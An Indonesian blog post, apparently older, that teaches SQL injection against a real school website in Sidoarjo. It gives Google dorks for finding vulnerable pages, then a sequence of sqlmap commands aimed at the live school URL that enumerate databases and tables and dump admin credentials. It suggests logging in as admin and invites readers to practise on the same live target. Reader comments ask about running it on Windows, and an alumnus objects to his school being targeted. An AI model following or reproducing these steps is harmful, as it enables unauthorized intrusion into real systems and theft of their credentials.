Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork
bertebaran di Google :D
Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan
tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan
menambahkan tanda - (minus) sebelum
nomor id tersebut.
Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira
seperti ini :
Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan
perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.
Kemudian untuk mencari
nama database, ketikkan “ ./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” (tanpa tanda
petik) kemudian Enter.
Kemudian akan muncul
seperti ini :
Disana kita dapat
menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita
mendapatkan Database tersebut, kita tulis “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables”
(tanpa tanda petik) kemudian Enter.
Setelah itu akan
muncul beberapa Tabel.
Kemudian kita mencari
Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T
namatable --columns” (tanpa tanda petik) kemudian Enter.
Disini kita akan
menjumpai beberapa Columns dari Tabel Admin.
Kemudian, untuk
mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik)
kemudian Enter.
Jika sudah mendapatkan
User + Pass, pasti Anda tau kan yang harus dilakukan ? :)
Nah, tinggal cari
Login Adminnya deh :D
Caranya banyak kok di
Google :)
Sekian dulu dari saya,
saya ucapkan Terimakasih Banyak :)
Untuk yang ingin
belajar SQL Map, silahkan menggunakan live target http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5
NB : GUNAKANLAH DENGAN BIJAK :)
10 komentar:
keren gan...nice<<<
@Anonim : Thank's kang :)
Oalah.. kalo pake windows gimana mas Rockey ? sama aja kah ?
Walah gw bingung nih adakah cara lain ane pake nya windows 7 wekekekek ga ada terminal nya seinget gw
weee itu kan bactrack bang
bukan windows
Windows Bisa kok asalkan ada Program Python Sama sqlmap data nye
Regard
./Sn4ckEye
sqlmap , nikto , xsser bisa
asal taro perl sama python duluu... ini gw dualboot bt5 sama w7..
gw ambil sqlmapnya dari bt5 kalo download yang untuk windows sqlmapnya hanya ringan..
wah.., ini target kok kota sendiri. kayaknya Admin ada gk enak ati ama SMA 2 Sidoarjo. Kami alumni Gk rela sekolah kami di acak2. MAFIA ( Masyarakat Fisika A ) akan menuntut balas
kalo ujungnya com atau blogspot.com bisa ga bro tanpa php?id= mungkin itu website jaman dulu
Great Article! Ayo bergabung dengan komunitas linux kami, kunjungi http://linux.blog.gunadarma.ac.id/
Posting Komentar